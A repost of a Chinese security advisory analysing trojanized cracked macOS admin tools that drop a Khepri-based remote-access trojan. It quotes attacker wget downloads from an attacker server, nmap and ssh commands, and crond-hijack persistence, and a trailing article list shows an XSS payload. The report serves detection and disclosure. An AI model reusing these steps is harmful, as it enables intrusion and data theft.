“暗蚊”黑产团伙通过国内下载站传播Mac远控木马攻击活动分析

黑客&网络安全如何

1          概述

近期,安天CERT发现一组利用非官方软件下载站进行投毒和攻击下游用户案例,并深入分析了攻击者在网管运维工具上捆绑植入macOS平台远控木马,利用国内非官方下载站发布,以此取得政企机构内部关键主机桥头堡,进行横向渗透的攻击活动。

此下载站目前可下载数十个破解软件,其中五款运维工具包含恶意文件,这五款运维工具集中在服务运维工具分类中,安天CERT判断该事件针对的目标为国内IT运维人员。当运维人员寻找macOS平台下免费或破解的运维工具时可能会搜索到该下载站,如果运维人员下载执行了含有恶意文件的运维工具,那么恶意文件会连接攻击者服务器下载并执行远控木马,攻击者可通过此远控木马窃取主机中的数据和文件,确定受害者及所在单位的信息,为后续横向渗透做准备。

安天CERT以攻击者发起的一起实际行动为案例,揭示攻击者横向渗透的手段:攻击者使用远程控制的方式窃取了受害者macOS操作系统主机中的文件;下载并使用fscan、nmap等工具对受害者的内网进行扫描,以获取内网更多服务器和主机的信息;利用口令破解、漏洞利用等渗透手段尝试获取更多服务器和主机的系统权限,横向渗透成功后在服务器上部署并运行hellobot后门。在此次行动中,虽然攻击者的横向渗透水平相对较弱,但是依然成功获取了服务器的系统权限。入侵成功后可能导致数据被窃、信息泄露、被长期监视等安全风险。

安天CERT的分析人员在搜索站搜索“Mac破解软件”等关键字时,该下载站在Google搜索站排名第一,在Bing搜索站排名第七。从该下载站的下载数量来看,含有恶意文件的五款运维工具下载总量已超3万次。安天CERT评估此次攻击活动影响范围较大,且大部分威胁情报平台尚未标记相关的恶意IoC情报,故披露此次攻击活动。建议在该下载站下载过这类运维工具的用户进行自查。

该黑产团伙采用供应链投毒、伪造官方软件网站、以及利用破解软件等多种方式传播恶意程序,主要攻击目标是IT运维人员,攻击范围涵盖了Windows、Linux以及macOS等操作系统。此外,该团伙使用经过精心构造的域名,并对下载的载荷文件进行混淆处理,以规避安全产品的检测,因此安天CERT用“暗蚊”组织命名该团伙。

在即将发布该报告时,安天CERT关联到了近期深信服披露的报告《【高级持续威胁(APT)】谁是“amdc6766”:一年四起供应链投毒事件的幕后黑手》[1],发现此次事件攻击活动中攻击者可能与友商披露的攻击者为同一批团伙。本次事件中用于传播的工具都是IT运维人员日常使用频次较高的软件工具,两起事件针对的目标重合;在诱饵工具名称和域名的伪装方面思路相似;载荷使用了相同的域名。

 

2          详细情况

2.1         监测情况

安天CERT监测到“MACYY”下载站上SecureCRT、FinalShell、Navicat等五款运维工具含有恶意文件。如果在macOS操作系统的主机中执行上述工具便会加载恶意文件,连接攻击者C2服务器下载执行远控木马。安天CERT的分析人员在搜索站搜索 “Mac破解软件”等关键字时,该下载站在Google搜索站排名第一,在Bing搜索站排名第七。

图 2‑1 该下载站Google搜索站排名第一

SecureCRT、FinalShell、Navicat、UltraEdit、Microsoft Remote Desktop共五款运维工具被植入恶意文件:

图 2‑2 红框中为此次发现被植入恶意代码的运维工具

从该下载站的下载数量来看,含有恶意文件的五款运维工具下载总量已超3万次。安天CERT评估此次攻击活动影响范围较大,且大部分威胁情报平台尚未标记相关的恶意IoC情报,故披露此次攻击活动。建议在该下载站下载过这类运维工具的用户进行自查,详细自查方法请参考本报告第六小节。

表 2‑1被植入恶意文件的运维工具相关信息

文件名

MD5

被植入恶意文件名

下载量

SecureCRT.dmg

94E0EE6189DF1DAD0EFB01374D67815C

libpng.dylib

6094

ultraedit.dmg

3FF4C5A86CE6A35B6D9A49478BD1058D

libConfigurer64.dylib

6716

Microsoft-Remote-Desktop-Beta-10.8.0(2029)_MacYY.dmg

81F75533298736A23597A34B505209B5

libpng.dylib

1507

FinalShell_MacYY.dmg

808B17A47A91421F50AF04A865DE26C7

libpng.dylib

824

navicat161_premium_cs.dmg

B74301CB51FB165F1ED8F2676A39FBBF

libpng.dylib

16188

当运维人员寻找macOS平台下免费的运维工具时被引流到该下载站,并从中下载执行含有恶意文件的运维工具。恶意文件会连接C2下载远控执行。攻击者在构造恶意域名时,针对不同运维工具采用不同域名且字符串与对应的运维工具文件名相关,从而增加通信隐蔽性。

表 2‑2被植入恶意文件的运维工具文件名和恶意域名

文件名

恶意域名

SecureCRT.dmg

download.securecrt.vip

ultraedit.dmg

download.ultraedit.info

Microsoft-Remote-Desktop-Beta-10.8.0(2029)_MacYY.dmg

download. rdesktophub.com

FinalShell_MacYY.dmg

download.finallshell.cc

navicat161_premium_cs.dmg

download.Macnavicat.com

2.2         攻击活动的时间线

安天CERT分析了此次攻击活动的时间线。攻击者从2023年3月份便着手开始策划此次攻击活动,其最早开始于3月20日注册了其所使用部分的C2域名,在3月至7月期间攻击者陆续注册了此次攻击活动中所涉及的10个C2域名,并在期间攻击者将使用的部分载荷上传至VT测试其免杀效果。最后攻击者在9月19日和20日将被植入恶意文件的五款运维工具上传至该下载站。

图 2‑3 安天CERT还原此次攻击活动时间线

3          攻击流程

被植入恶意文件的破解软件包含IT运维人员常用的SecureCRT、FinalShell、Navicat等五款运维工具。运维工具运行后连接攻击者C2服务器下载远控木马,该远控木马是攻击者基于开源跨平台KhepriC2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力。

3.1         初始访问攻击

由于攻击者在这五款运维工具中所采用的攻击方式一样,初始访问攻击以破解版的SecureCRT软件分析为例进行展开。攻击者将恶意文件libpng.dylib添加至破解版的SecureCRT软件中并将其投放至下载站。当用户运行该软件后,软件加载被植入的恶意文件libpng.dylib,连接攻击者搭建的C2服务器下载名为se01.log和bd.log两个加密载荷。libpng.dylib对se01.log文件解密后释放Mac远控木马,该木马是攻击者基于开源跨平台Khepri C2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力;libpng.dylib对bd.log文件解密后释放一个名为fseventsd的加载器,该加载器会将自身添加至开机启动项中,以实现持久化。截至安天CERT分析时该加载器用于下载其他载荷的URL已失效且未在公开情报系统中关联到,故无法分析其最终落地载荷。

图 3‑1 破解版的SecureCRT软件攻击流程

3.2         内网横向移动流程

安天CERT以攻击者发起的一起实际行动为案例,揭示攻击者横向渗透的手段:

图 3‑2 攻击者内网横向移动攻击流程

步骤1:远控下载反向Shell工具

在受害者macOS操作系统主机中成功植入Khepri远控木马后,攻击者访问恶意软件服务器下载了一个基于开源跨平台工具goncat进行修改的木马,该木马的主要功能是实现反向Shell连接。攻击者下载goncat木马命令如下:

wget http://159.75.xxx.xxx:443/mac2

步骤2:文件窃取和分析

攻击者利用该木马将受害者macOS操作系统主机中的各类文件上传至匿名文件共享服务托管平台oshi.at上。攻击者基于所收集到的文件进行分析,为进一步的横向移动做准备。

图 3‑3 匿名文件共享服务托管平台oshi.at

步骤3:内网网络扫描

攻击者下载了fscan、nmap等扫描工具,并使用nmap网络扫描工具对开放了22端口的主机进行扫描。此外,攻击者还利用fscan扫描工具对内网进行了扫描,以获取内网更多服务器和主机的信息,包括主机存活信息、端口信息、常见服务信息、Windows网卡信息、Web指纹信息以及域控信息等。使用nmap工具扫描某网段命令如下所示:

nmap -Pn -p22 -oG - 172.xx.xx.xxx/24

步骤4:使用多种渗透手段:

攻击者利用Web漏洞和SSH暴力破解等手段来获取受害者更多的服务器和主机访问权限。使用ssh登陆某服务器命令如下:

ssh xxxxx@172.xx.xx.xxx

步骤5:部署后门进行持久化

攻击者会访问恶意软件服务器下载一个名为centos7的文件,该文件运行后会在当前路径下释放一个名为libdb.so.2的文件,利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,加载执行恶意文件libdb.so.2。经分析发现libdb.so.2文件为hellobot后门,该后门主要功能有文件管理、远程Shell、端口扫描、服务代理等。下载Centos7文件命令如下所示:

wget http://159.75.xxx.xxx:8088/centos7

尽管在此次行动中,攻击者的横向移动整体水平相对较弱,然而并不能忽略其所带来的危害。即使攻击者横向移动能力有限,但仍能通过成功植入恶意软件、利用漏洞和暴力破解等手段,对受害者的系统和数据造成严重的损害。这种攻击形式可能导致敏感信息泄露、系统崩溃、服务中断以及进一步的攻击扩散,对受害者的隐私和安全构成潜在风险。因此,需认真对待这些攻击,并采取适当的安全措施来保护系统和数据免受威胁。

4          关联分析

经关联分析发现,“暗蚊”黑产团伙可能与近期友商披露的报告《【高级持续威胁(APT)】谁是“amdc6766”:一年四起供应链投毒事件的幕后黑手》中的攻击者为同一团伙。发现此次事件攻击活动中攻击者为同一团伙。本次事件中用于传播的工具都是IT运维人员日常使用频次较高的软件工具,两起事件针对的目标重合;在诱饵工具名称和域名的伪装方面思路相似;载荷使用了相同的域名。

  1. 本次事件针对IT运维人员,且工具名称和使用的域名相似

攻击者在下载站中上传的破解软件SecureCRT、Ultraedit、Microsoft-Remote-Desktop-Beta、FinalShell、Navicat,都是IT运维人员日常使用频次较高的软件工具,且都被归于该网站的“服务器运维”类别中,表明攻击者有针对性地对IT运维人员进行攻击。

此外,攻击者在本次攻击活动中用于托管恶意载荷的域名,形式上也与攻击者在此前攻击活动中使用的相似。

表 4‑1 攻击者在攻击活动中用于托管恶意载荷的域名

此次攻击活动中用于托管Mac恶意载荷的域名

此前攻击活动中用于托管恶意载荷的域名

download.securecrt.vip

download.oneinstack.club

download.ultraedit.info

download.cnoneinstack.club

download. rdesktophub.com

download.lnmp.life

download.finallshell.cc

download.cnoneinstack.com

download.Macnavicat.com

download.amh.tw

  1. 使用crond服务持久化和后门动态链接库手法与友商披露类似。

本次攻击活动中攻击者在内网Linux机器上-访问恶意软件服务器下载一个名为centos7的文件,该文件运行后会在当前路径下释放一个名为libdb.so.2的文件,利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,加载执行恶意文件libdb.so.2。其中使用crond服务持久化和后门动态链接库手法类似。

  1. 最终载荷使用的恶意域名net相同

在本次攻击活动中,攻击者在内网Linux机器上使用的最终载荷为hellobot后门,其外联域名为Microsoft.amdc6766.net,与友商分析报告中披露的恶意域名相同。

5          样本详细分析

5.1         破解版SecureCRT软件分析

由于攻击者在这五款运维工具中所采用的攻击方式一样,样本详细分析以破解版的SecureCRT软件分析为例。

表 5‑1破解版SecureCRT软件样本标签

病毒名称

Trojan/MacOS.DarkMozzie[Backdoor]

原始文件名

SecureCRT.dmg

MD5

94E0EE6189DF1DAD0EFB01374D67815C

文件格式

Macintosh Disk Image

文件大小

44.47 MB (46625933 字节)

数字签名

加壳类型

VT首次上传时间

2023-11-29 07:11:15

VT检测结果

17 / 59

注:可在计算机病毒分类命名百科全书Virusview.net,搜索“DarkMozzie”查看更多该病毒家族相关信息。

SecureCRT是VanDyke Software公司开发的一个商业SSH、Telnet客户端和虚拟终端软件。本次攻击活动破解版SecureCRT软件相较于官网提供的SecureCRT,在Frameworks文件夹中多出一个名为“libpng.dylib”的动态库文件。

图 5‑1 SecureCRT官方版本与破解版本对比

破解版SecureCRT的主Mach-O文件运行时会对该动态库文件libpng.dylib进行加载。

图 5‑2 破解版SecureCRT加载libpng.dylib

5.1.1          libpng.dylib文件分析

libpng.dylib从硬编码的URL处获取下一阶段载荷文件,解码后保存至指定的路径中执行。

图 5‑3 libpng.dylib用于获取下一阶段的载荷文件

对下载的载荷进行解密算法如下所示

图 5‑4 解密算法

5.1.2          解密后的.test文件分析

解密后的.test文件与指定的C2域名进行连接。

图 5‑5 与指定C2域名连接

该木马是攻击者基于开源跨平台KhepriC2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力。

图 5‑6 开源平台Khepri远控功能

5.1.3          解密后的.fseventsd文件分析

.fseventsd文件会将自身添加至开机启动项中,以实现持久化。

图 5‑7 将自身添加至开机启动项

.fseventsd文件从硬编码的URL处获取文件,并下载至指定路径中,截至安天CERT分析时该加载器用于下载其他载荷的URL已失效,故无法分析其最终落地载荷。

图 5‑8 下载其他载荷

5.2         内网横向移动使用的样本分析

5.2.1          mac2文件分析

mac2文件是基于开源跨平台工具goncat进行修改的木马,该木马除了支持反弹Shell,同时还支持自删除功能等。安天CERT推测,攻击者在受害者macOS操作系统主机上再次下载一个木马的原因可能是方便执行命令。

图 5‑9 样本调用函数

图 5‑10样本命令行运行截图

5.2.2          centos7文件分析

centos7样本读取自身内容,并根据“ELFELF”找到标记的偏移位置,将该位置后的内容写入当前路径中,并命名为“libdb.so.2”。

图 5‑11释放libdb.so.2文件

利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,以加载执行恶意文件libdb.so.2。

图 5‑12劫持crond服务的动态库文件,并修改时间属性值

libdb.so.2是一个hellobot后门,其解密后的配置信息如下图所示。

图 5‑13该hellobot后门的配置信息

配置信息中每一项配置所对应的功能如下表所示。

表 5‑2配置信息功能

配置项

功能

host

上线地址及端口

group

组名称

install_path

安装后的文件名称

install_path_bak

安装之后备份的文件路径

retry_interval

重连的时间间隔

dns

域名解析使用的DNS

fake_ps

伪装的进程名称

auto_start

是否自启动

note

备注

lock_file

锁文件

plugin_dir

插件目录

mon_interval

监控进程循环执行检测的时间间隔

close_iptable

是否自动清除iptables规则

protocol

通信时使用的协议

该hellobot后门的功能包括如下表所示的内容。

表 5‑3功能列表

功能分类

备注

CManager

对受控设备进行管理

CFileTask

对受控设备中的文件进行管理

CPortMapTask

端口扫描

CShellTask

执行Shell命令

CPluginTask

对插件进行管理

CProxyTask

服务器代理操作

6          安全建议

针对以“暗蚊”为代表的黑产团伙,以IT运营者使用远程访问、编辑器、数据库管理等免费或破解版运维工具作为突破口投放攻击载荷,通过网内横向移动,进一步收集信息并维持持久化,最终窃取主机中的数据和文件的攻击模式,安天CERT建议:

6.1         开展针对性自查

1、对于使用苹果操作系统的IT运营者

(1)确认是否曾在MACYY或其它网站中下载以下运维工具并核对破解软件的MD5:远程访问(SecureCRT、FinalShell 、Microsoft Remote Desktop)、编辑器(UltraEdit)、数据库管理(Navicat Premium);

图 6‑1确认是否曾下载这些运维工具

(2)检查/tmp/目录中是否存在.test、.fseventsds文件,/Users/Shared/目录中是否存在.fseventsd文件,并检查.fseventsd文件是否被设置为开机启动项。

2、对于使用Linux操作系统的IT运营者

(1)检查/usr/sbin/cron(或crond)文件近期是否被改动;

(2)检查/usr/sbin/cron(或crond)文件所依赖的动态链接库中是否存在libdb.so.2文件;

(3)检查libdb.so.2文件是否存在问题:检查MD5是否为F23ED5D991CF0C8AA8378774E8FA93FE,或者检查libdb.so.2文件的改动时间是否与/usr/sbin/cron(或crond)文件的改动时间相近。

6.2         增强正版软件使用意识

建议IT运营者(尤其是使用苹果操作系统的IT运营者)从官方地址下载常用运维工具,以破解为代表的免费下载站极大可能存在供应链污染,尤其不要相信“苹果操作系统上不会存在病毒”的伪科普。更重要的是,由于IT运营者在使用苹果设备时极大可能不会经常关机,以致“暗蚊”黑产团伙通过远控并持续窃密留下了可乘之机。

6.3         加强主机侧安全防护

建议IT运营者部署企业级终端防御系统,加强针对“暗蚊”黑产团伙在内网横向移动环节的防护。由于当前已知攻击范围已覆盖多个平台,建议已部署Windows、Linux的智甲产品用户启用主动防御功能,并保持病毒库更新到最新。

6.4         提升网络威胁监测与响应

建议IT运营者部署网络威胁检测与响应系统(NTA或NDR)可以结合“暗蚊”相关信标进行告警。

6.5         遭受攻击及时应急处置

IT运营者若在针对性自查或日常工作中发现疑似遭受“暗蚊”黑产团伙的攻击,建议及时隔离被攻击的主机,并保护现场等待安全工程师对主机进行排查。

7          IoCs

IoCs

94E0EE6189DF1DAD0EFB01374D67815C

3FF4C5A86CE6A35B6D9A49478BD1058D

81F75533298736A23597A34B505209B5

735B14D2D9BB4AA848B555AD6F567307

B74301CB51FB165F1ED8F2676A39FBBF

20BA990BE3773C179A4200BC8950463A

4D211EA7D1961B029D30F76FA98C0320

F23ED5D991CF0C8AA8378774E8FA93FE

06158766498ACAC14C70BE52A6C6FDF3

32421A007F28AACF869A46F714945AD0

学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

 1.学习路线图 

 攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

 (都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。 

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。 

 还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

 最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取 

  

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/854532.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

计算机SCI期刊,IF=13.3+,期刊质量非常高,声誉佳

一、期刊名称 INTERNATIONAL JOURNAL OF COMPUTER VISION 二、期刊简介概况 期刊类型:SCI 学科领域:计算机科学 影响因子:13.369 中科院分区:2区 三、期刊征稿范围 《国际计算机视觉杂志》详细介绍了这一快速发展的领域的科…

XSS学习(绕过)

学习平台&#xff1a;xss.tesla-space.com XSS学习&#xff08;绕过&#xff09; level1level2level4level5level6level7level8level9level10level11level12 level1 应该没有过滤 https://xss.tesla-space.com/level1.php?name<script>alert(1);</script> leve…

探索AI绘画工具的前沿:创新科技与艺术的无缝融合

在科技和艺术交织的时代&#xff0c;AI绘画工具以其独特的魅力引领着创作的新潮流。本文将带您深入了解AI绘画工具的前沿技术&#xff0c;并通过最新例子展示其实际应用和潜力。 AI绘画工具概述 AI绘画工具通过集成深度学习、自然语言处理等技术&#xff0c;实现了从文字描述…

Dubbo-使用zookeeper作为注册中心时节点的概述

本文内容很容易理解&#xff0c;会阐述当dubbo使用zookeeper作为注册中心时候&#xff0c;zookeeper节点是什么样子的 本文的代码使用的dubbo版本是2.7.x&#xff0c;几年前的版本了&#xff0c;但是不影响探究 首先我们创建一个简单的maven项目&#xff0c;然后写出一段dubb…

第二篇: 掌握Docker的艺术:深入理解镜像、容器和仓库

掌握Docker的艺术&#xff1a;深入理解镜像、容器和仓库 1. 引言 1.1 简要介绍Docker的重要性 在当今快速发展的技术世界中&#xff0c;软件开发和部署的效率和可靠性是衡量成功的关键因素。Docker&#xff0c;作为一个开源的容器化平台&#xff0c;革新了软件的打包、分发和…

【S32K 进阶之旅】 将 EB 配置生成的 MCAL 代码集成到 S32DS 中

本文介绍如何使用 S32DS 进行 AUTOSAR MCAL 工程的编译和调试&#xff0c;重点在于将 EB 配置生成的 MCAL 代码集成到 S32DS 中。 虽然配置过程较为繁琐&#xff0c;实操过一遍就会熟悉整个工程的框架。以后每次在 EB 中更新配置&#xff0c;生成代码的文件夹已经集成在 S32DS…

python反序列化知识点学习

最近遇到了python反序列化的题目&#xff0c;简单学习一下相关的知识点 基础知识 Python 的序列化指的是将 Python 对象转换为一种格式&#xff0c;以便可以将其存储在文件或通过网络传输。Python 中最常用的序列化模块是 pickle 模块。 序列化使用的是pickle.dumps方法&…

【权威出版/投稿优惠】2024年智慧城市与信息化教育国际会议(SCIE 2024)

2024 International Conference on Smart Cities and Information Education 2024年智慧城市与信息化教育国际会议 【会议信息】 会议简称&#xff1a;SCIE 2024 大会时间&#xff1a;点击查看 大会地点&#xff1a;中国北京 会议官网&#xff1a;www.iacscie.com 会议邮箱&am…

视觉应用线扫相机速度反馈(伺服转盘)

运动控制实时总线相关内容请参考运动控制专栏&#xff0c;这里不再赘述 1、运动控制常用单位u/s运动控制单位[u/s]介绍_运动控制 unit是什么单位-CSDN博客文章浏览阅读176次。运动控制很多手册上会写这样的单位&#xff0c;这里的u是英文单词unit的缩写&#xff0c;也就是单位…

拓保全方位赋能,构建证券数字化蓝图

证券行业是我国金融业的重要基石&#xff0c;证券行业加速发展有利于拓宽融资渠道&#xff0c;释放市场活力&#xff0c;促进我国经济健康、普惠、持续高质量发展。作为深耕行业的软件信息服务提供商&#xff0c;拓保从顶层设计的高度上&#xff0c;构建证券数字化转型蓝图&…

ctfshow web 单身杯

web签到 <?phperror_reporting(0); highlight_file(__FILE__);$file $_POST[file];if(isset($file)){if(strrev($file)$file){ //翻转函数include $file;}}要进行反转并且包含文件用data协议 自己写不好写可以用函数帮你翻转 <?php $adata:text/plain,<?eval(…

黄金价格与美元的关系变了?

在一些传统的定价框架中&#xff0c;现货黄金的价格走势取&#xff0c;决于美元的实际利率水平——实际利率越高&#xff0c;黄金价格越低&#xff0c;反之亦然。在大多数的时候&#xff0c;美元的实际利率决定了美元指数的高低所以人们通常认为&#xff0c;现货金价与美元呈反…

基于深度学习的鸟类检测识别系统【python源码+Pyqt5界面+数据集+训练代码 MX_003期】

简介&#xff1a; 基于深度学习的鸟类检测识别系统在当今世界中具有广泛的应用前景。系统不仅可以帮助生态学家和保护人员监测和保护鸟类种群&#xff0c;还能在农业管理、城市生态监测以及科学研究领域发挥重要作用。通过自动化的图像识别技术&#xff0c;可以实现对鸟类种类、…

26 岁的“天才少年”,带队面壁打通高效大模型之路

每一轮技术浪潮出现时&#xff0c;冲在最前面的都是朝气蓬勃的年轻人。 当大模型代表的人工智能浪潮席卷全球&#xff0c;作为移动互联网“原住民”的年轻开发者&#xff0c;可以说是最活跃的群体。他们的脸庞还有些稚嫩&#xff0c;但在技术和方向上有着自己的想法&#xff0…

西格玛 ------ 第18个希腊字母学习

名词解释 在数学中&#xff0c;我们把∑作为求和符号使用&#xff0c;用小写字母σ&#xff0c;表示标准差。 ∑符号表示求和&#xff0c;读音为sigma&#xff0c;英文意思为Sum&#xff0c;Summation&#xff0c;汉语意思为“和”“总和”。 例1 公式使用说明&#xff1a;…

python图像处理库-PIL(Pillow)

PIL库全称为Python Imaging Library&#xff0c;即Python图像处理库&#xff0c;是一个在Python中用于处理图像的非常流行的库。 一、PIL介绍 这个库提供了广泛的文件格式支持、高效的内部表示以及相当强大的图像处理功能。 核心图像库旨在快速访问存储在几种基本像素格式中的数…

元数据:数据的罗塞塔石碑

在大数据时代&#xff0c;我们每天都在生成和处理海量数据。但数据本身&#xff0c;如果没有适当的上下文和描述&#xff0c;就像是一堆没有翻译的古老文字。这就是元数据发挥作用的地方——它是大数据世界的罗塞塔石碑&#xff0c;为我们提供了理解和利用数据的关键。 文章目录…

计算机组成原理之存储器(一)

文章目录 存储器概述存储器的分类情况按照存储器在系统中的作用分类按存储介质分类按存取方式分类 主存储器的技术指标 存储器概述 程序的局部性原理&#xff08;构成多级存储系统的依据&#xff09;&#xff1a;在某一个时间段你频繁访问某一局部的存储器地址空间&#xff0c;…

Excel加密怎么设置?这5个方法不容错过!(2024总结)

Excel加密怎么设置&#xff1f;如何不让别人未经允许查看我的excel文件&#xff1f;如果您也有这些疑问&#xff0c;那么千万不要错过本篇文章了。今天小编将向大家分享excel加密的5个简单方法&#xff0c;保证任何人都可以轻松掌握&#xff01;毫无疑问的是&#xff0c;为Exce…

长短期记忆神经网络(LSTM)的回归预测(免费完整源代码)【MATLAB】

LSTM&#xff08;Long Short-Term Memory&#xff0c;长短期记忆网络&#xff09;是一种特殊类型的递归神经网络&#xff08;RNN&#xff09;&#xff0c;专门用于处理和预测基于时间序列的数据。与传统RNN相比&#xff0c;LSTM在处理长期依赖问题时具有显著优势。 LSTM的基本…